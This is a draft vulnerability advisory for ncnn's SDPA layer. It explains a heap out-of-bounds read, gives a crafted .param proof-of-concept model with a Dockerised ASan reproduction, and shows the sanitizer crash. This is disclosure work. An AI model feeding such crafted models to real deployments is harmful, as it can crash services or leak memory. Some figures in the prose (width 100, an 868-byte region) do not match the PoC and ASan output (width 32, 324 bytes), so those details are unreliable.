All advisories
Draft

SDPA Shape Mismatch Causes Heap Out-Of-Bounds Read

Tencent/ncnn

Affected packages

ncnn other
Affected versions= 5e66f094bf7c597b4569cc014a8be84104748678
Patched versionsNot specified

Description

SDPA Shape Mismatch Causes Heap Out-Of-Bounds Read

Affected commit: 5e66f094bf7c597b4569cc014a8be84104748678
Sink: src/layer/x86/sdpa_x86.cpp:254 in SDPA_x86::forward
Sanitizer verdict: heap-buffer-overflow

Summary

A model whose SDPA query head count is not a multiple of its key/value group count makes ncnn select a key channel that does not exist, producing a Mat view past the end of the key allocation that the AVX-512 GEMM then reads out of bounds, aborting ncnnoptimize. The attacker supplies only a .param file; ncnnoptimize inparam inbin outparam outbin 0 materializes the declared Input shapes and executes the graph in ModelWriter::shape_inference(). Without a sanitizer the stale bytes are multiplied into the attention scores instead of trapping.

Detail

SDPA_x86::forward reads num_heads from the query tensor and num_group from the key tensor, then assumes grouped-query attention's invariant that the groups evenly divide the heads. num_heads_per_group is computed with plain integer division, and the per-head key channel is i / num_heads_per_group — an expression that only stays in range when num_heads % num_group == 0. Nothing validates that, and Mat::channel performs no bounds check:

// src/layer/x86/sdpa_x86.cpp:149
    const int embed_dim = query.w;
    const int src_seqlen = query.h;
    const int num_heads = query.c;
    const int cur_seqlen = cur_key.h;
    const int num_group = cur_key.c;

// src/layer/x86/sdpa_x86.cpp:206
    const int num_heads_per_group = num_heads / num_group;

// src/layer/x86/sdpa_x86.cpp:248
    #pragma omp parallel for num_threads(opt.num_threads)
    for (int i = 0; i < num_heads; i++)
    {
        // 1. Q * K^T
        std::vector<Mat> qk_bottom_blobs;
        qk_bottom_blobs.push_back(query.channel(i));                     // Q: [Seq, Embed]
        qk_bottom_blobs.push_back(key.channel(i / num_heads_per_group)); // K: [DstSeq, Embed]

// src/layer/x86/gemm_x86.cpp:1576
            const float* p0 = (const float*)B + (j + jj) * B_hstep + k;

            int kk = 0;
#if __SSE2__
#if __AVX__
            for (; kk + 7 < max_kk; kk += 8)
            {
                _mm256_storeu_ps(pp, _mm256_loadu_ps(p0));

The PoC declares Input q 0 1 q 0=100 1=1 2=3 against Input k 0 1 k 0=100 1=1 2=2, so num_heads = 3 and num_group = 2. Integer division gives num_heads_per_group = 3 / 2 = 1, which turns the group mapping into the identity i / 1 == i. SDPA sdpa 3 1 q k v out 5=0 leaves kv_cache off, so key = cur_key with key.c == 2.

The final iteration, i == 2, calls key.channel(2) on a two-channel blob. cstep is alignSize(100 * 4, 16) / 4 = 100, so the view starts at data + 2 * 100 * 4 = data + 800 bytes, while the blob's whole allocation is 868 bytes (800-byte payload, 4-byte refcount, 64-byte NCNN_MALLOC_OVERREAD slack). That view still advertises a 100-element row, and it is handed to the GEMM as operand B. pack_B_tile copies it with 32-byte _mm256_loadu_ps loads; the load at offset 64 of the phantom channel starts at byte 864 of the region and spans past its end at 868 — the READ of size 32 ... 0 bytes after 868-byte region in the ASan report.

Reproduce

Build and run (writes the Dockerfile, builds ncnn with ASan, runs the PoC)
mkdir -p ncnn-poc-sdpa-shape-mismatch-causes-heap-out-of-bounds-read && cd ncnn-poc-sdpa-shape-mismatch-causes-heap-out-of-bounds-read

cat > Dockerfile <<'DOCKERFILE'
FROM ubuntu:24.04

RUN apt-get update && apt-get install -y --no-install-recommends \
      git ca-certificates g++ cmake make python3 python3-pip python3-numpy \
      protobuf-compiler libprotobuf-dev \
 && pip3 install --no-cache-dir --break-system-packages onnx protobuf \
 && rm -rf /var/lib/apt/lists/*

RUN git clone --depth 1 https://github.com/Tencent/ncnn.git /ncnn

WORKDIR /ncnn
RUN cmake -S . -B build \
      -DCMAKE_BUILD_TYPE=Debug \
      -DCMAKE_C_FLAGS="-O0 -g -fsanitize=address" \
      -DCMAKE_CXX_FLAGS="-O0 -g -fsanitize=address" \
      -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \
      -DNCNN_BUILD_TOOLS=ON -DNCNN_BUILD_EXAMPLES=ON -DNCNN_BUILD_BENCHMARK=ON \
      -DNCNN_BUILD_TESTS=OFF -DNCNN_VULKAN=OFF -DNCNN_OPENMP=OFF \
 && cmake --build build -j"$(nproc)"

ENV ASAN_OPTIONS=detect_leaks=0
WORKDIR /poc
DOCKERFILE

cat > poc.param <<'POC_PARAM'
7767517
4 4
Input q 0 1 q 0=32 1=1 2=3
Input v 0 1 v 0=32 1=1 2=2
Input k 0 1 k 0=32 1=1 2=2
SDPA sdpa 3 1 q k v out
POC_PARAM

docker build -t ncnn-asan .
docker run --rm --network none -v "$PWD:/poc" ncnn-asan \
  /ncnn/build/tools/ncnnoptimize poc.param null out.param out.bin 0

AddressSanitizer output:

shape_inference
=================================================================
==1==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x514000000380 at pc 0x59df22ae976b bp 0x7ffeee342ef0 sp 0x7ffeee342ee0
READ of size 32 at 0x514000000380 thread T0
    #0 0x59df22ae976a in _mm256_loadu_ps(float const*) /usr/lib/gcc/x86_64-linux-gnu/13/include/avxintrin.h:905
    #1 0x59df22ae976a in pack_B_tile /ncnn/build/src/layer/x86/gemm_x86_avx512.cpp:1583
    #2 0x59df22b615a8 in gemm_x86 /ncnn/build/src/layer/x86/gemm_x86_avx512.cpp:6925
    #3 0x59df22ba9c11 in ncnn::Gemm_x86_avx512::forward(std::vector<ncnn::Mat, std::allocator<ncnn::Mat> > const&, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/build/src/layer/x86/gemm_x86_avx512.cpp:7796
    #4 0x59df25383c86 in ncnn::SDPA_x86_avx512::forward(std::vector<ncnn::Mat, std::allocator<ncnn::Mat> > const&, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/build/src/layer/x86/sdpa_x86_avx512.cpp:274
    #5 0x59df1c4b170b in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:856
    #6 0x59df1c499b7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
    #7 0x59df1c4f99e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
    #8 0x59df1c38b3c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
    #9 0x59df1c408eee in main /ncnn/tools/ncnnoptimize.cpp:2844
    #10 0x788dfd0501c9  (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #11 0x788dfd05028a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #12 0x59df1c388624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)

0x514000000384 is located 0 bytes after 324-byte region [0x514000000240,0x514000000384)
allocated by thread T0 here:
    #0 0x788dfd6c9f1d in posix_memalign ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
    #1 0x59df1c45992d in fastMalloc /ncnn/src/allocator.h:62
    #2 0x59df1c45992d in ncnn::Mat::create(int, int, int, unsigned long, ncnn::Allocator*) /ncnn/src/mat.cpp:415
    #3 0x59df1c389ca0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:390
    #4 0x59df1c408eee in main /ncnn/tools/ncnnoptimize.cpp:2844
    #5 0x788dfd0501c9  (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #6 0x788dfd05028a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #7 0x59df1c388624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)

SUMMARY: AddressSanitizer: heap-buffer-overflow /usr/lib/gcc/x86_64-linux-gnu/13/include/avxintrin.h:905 in _mm256_loadu_ps(float const*)

Credit

Zheng Yu @ DepthFirst